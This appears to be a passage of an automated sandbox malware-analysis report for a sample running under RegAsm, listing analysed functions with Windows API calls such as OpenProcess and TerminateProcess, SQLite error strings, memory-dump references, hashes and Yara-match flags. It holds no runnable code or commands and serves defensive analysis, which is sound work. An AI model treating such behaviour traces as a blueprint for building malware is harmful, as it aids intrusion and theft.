                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 93ba2142ea2a926e5d9b02b27c8632a6d012321557e18e6b920348f14f4e6f85
                                                                                                                                                                                                • Instruction ID: 8ca5dfeba2299fe6a26a2e240e847641616a40df3282bf96674dae22bbd0fcd2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 93ba2142ea2a926e5d9b02b27c8632a6d012321557e18e6b920348f14f4e6f85
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16028BB09043568FE704CF65DA84B9BBBE9BF94314F04492DFD8987240E774E948CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B51AF80 Relevance: 7.8, APIs: 5, Instructions: 277COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 328429571dd029f8f14508099e6485f76c98b09132ebd948d08f210fcfe6a5be
                                                                                                                                                                                                • Instruction ID: c61e93d7f0832c84bcc94b5f90fb112cd1f8d8db2b3bbe189d81ca60d0940799
                                                                                                                                                                                                • Opcode Fuzzy Hash: 328429571dd029f8f14508099e6485f76c98b09132ebd948d08f210fcfe6a5be
                                                                                                                                                                                                • Instruction Fuzzy Hash: 47A18D70900621DBF7199F65D8CCB9A376CBFA0255F05082CEC89DA210D735E99DCBE6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00410041 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00410046
                                                                                                                                                                                                • memset.MSVCRT ref: 00410068
                                                                                                                                                                                                  • Part of subcall function 0040FC97: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00410095,00000000), ref: 0040FCA2
                                                                                                                                                                                                  • Part of subcall function 0040FC97: HeapAlloc.KERNEL32(00000000,?,00410095,00000000), ref: 0040FCA9
                                                                                                                                                                                                  • Part of subcall function 0040FC97: wsprintfW.USER32 ref: 0040FCBA
                                                                                                                                                                                                • OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 004100EF
                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004100FD
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410104
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1628159694-0
                                                                                                                                                                                                • Opcode ID: 53caff0e473cfa85726e3c0e16e5b2cf701e344f27a2a358bc1c6c031573df49
                                                                                                                                                                                                • Instruction ID: e9ad4f972dd87a98a913caa6f0350bb6e054dc857a7db03b2a5ca278fbcbe3de
                                                                                                                                                                                                • Opcode Fuzzy Hash: 53caff0e473cfa85726e3c0e16e5b2cf701e344f27a2a358bc1c6c031573df49
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B317C71901228ABDB21EBA0CC49DEFBB7DFF09350F10042AF506E2191D7785A84CBA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040FEA4 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 36stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00410983,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040FEB0
                                                                                                                                                                                                • lstrcpyn.KERNEL32(0063F728,?,00000000,00000104,?,00410983,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040FEC9
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000104,?,00410983,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040FEDB
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040FEED
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                • String ID: %s%s
                                                                                                                                                                                                • API String ID: 1206339513-3252725368
                                                                                                                                                                                                • Opcode ID: e92cff456060258149841d4bb495c405314cdc161fe95fe92087355cc49e3ce9
                                                                                                                                                                                                • Instruction ID: df5a5b5f159a13b6baa99ac3a7e21560887ff36d1ae897044455795c8e3c6100
                                                                                                                                                                                                • Opcode Fuzzy Hash: e92cff456060258149841d4bb495c405314cdc161fe95fe92087355cc49e3ce9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F054326001297BDB011F59AC48AABBFAEEF5A7A5F040036FD0893211C772591587E5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00419181 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041918D
                                                                                                                                                                                                  • Part of subcall function 00419364: __getptd_noexit.LIBCMT ref: 00419367
                                                                                                                                                                                                  • Part of subcall function 00419364: __amsg_exit.LIBCMT ref: 00419374
                                                                                                                                                                                                • __getptd.LIBCMT ref: 004191A4
                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 004191B2
                                                                                                                                                                                                • __lock.LIBCMT ref: 004191C2
                                                                                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 004191D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 938513278-0
                                                                                                                                                                                                • Opcode ID: d31de9daf591632f542482bda8f730c6c683c8fd1dd29d8e9bcaa23dedb6ee0d
                                                                                                                                                                                                • Instruction ID: 9dd8d7685a1afa9795b6892bed10e6d741995b5cd10fedb1a919315536b17d2a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d31de9daf591632f542482bda8f730c6c683c8fd1dd29d8e9bcaa23dedb6ee0d
                                                                                                                                                                                                • Instruction Fuzzy Hash: A6F09632A40711AAEB21BB76581A7CD32A06F04B28F14414FF411672D2CF2C5EC1CA5D
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004078DF Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004078E4
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407E33
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407E47
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                • API String ID: 3207582090-1885708031
                                                                                                                                                                                                • Opcode ID: 95ab6ae9d41267cd4cbe941da05c12f5f9fec3af852a616dafe1bc6877076ef3
                                                                                                                                                                                                • Instruction ID: d6daef34dd889aade97a6d088ac326fffd9d4fa63bfd2f3c0a532a041e6e8760
                                                                                                                                                                                                • Opcode Fuzzy Hash: 95ab6ae9d41267cd4cbe941da05c12f5f9fec3af852a616dafe1bc6877076ef3
                                                                                                                                                                                                • Instruction Fuzzy Hash: FD125E71804148EADB05EBE6C956FEEBB78AF15308F1044BEE442731C2DB781B58DB66
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B73C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • fts5: syntax error near "%.*s", xrefs: 1B5B751C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: fts5: syntax error near "%.*s"
                                                                                                                                                                                                • API String ID: 0-498961494
                                                                                                                                                                                                • Opcode ID: 104b3a3073fad71d278320154e199e3180d02c375d8795ad79224adb6594ca3f
                                                                                                                                                                                                • Instruction ID: a5b28d1759a4617f53b45815f8538d691fafa095175a8218aaefd7a8c806cae9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 104b3a3073fad71d278320154e199e3180d02c375d8795ad79224adb6594ca3f
                                                                                                                                                                                                • Instruction Fuzzy Hash: DDB1AE708043419FE714CF24C984B9BBBE9BF94308F18495DF8D997240E775E98ACBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AF7F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: integer overflow
                                                                                                                                                                                                • API String ID: 0-1678498654
                                                                                                                                                                                                • Opcode ID: cb227db4fcfefdc9eb0f5bce7329ee6f4d61a2e21a162d4df8e27e99ed85d94c
                                                                                                                                                                                                • Instruction ID: b066d0a1d22195a97db6aac6ef6cca5b169486834b94e4fd1df0976b0b7a32d8
                                                                                                                                                                                                • Opcode Fuzzy Hash: cb227db4fcfefdc9eb0f5bce7329ee6f4d61a2e21a162d4df8e27e99ed85d94c
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB11D375C047216ADF01BF34BC01BCA7BA95F6A324F05835DE4969A2E2E76091D9C3D3
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B82E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: [%d]
                                                                                                                                                                                                • API String ID: 0-394612830
                                                                                                                                                                                                • Opcode ID: c9c2ab3a1b9d10b60aaa7b8c3a8d83901afa7334c6514d1f4b9513d05debeca8
                                                                                                                                                                                                • Instruction ID: a4a2688be776aacc3f4034080c0ba71da1231124f2c1b4142a91ce67572a1807
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9c2ab3a1b9d10b60aaa7b8c3a8d83901afa7334c6514d1f4b9513d05debeca8
                                                                                                                                                                                                • Instruction Fuzzy Hash: CB71E3B5908341AEFB20CB20DE81FE777E9AB85704F44891DE68582681F735F549CB72
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B596180 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B596391
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B596396
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B596387
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 2828baff745f48db3ec292c075e835b153039b9630abc7c9cafd21bf68bcceec
                                                                                                                                                                                                • Instruction ID: bc6a22cb9c6bec40b1c7343e0c012322df67a22a93ef240302d865b301124d3b
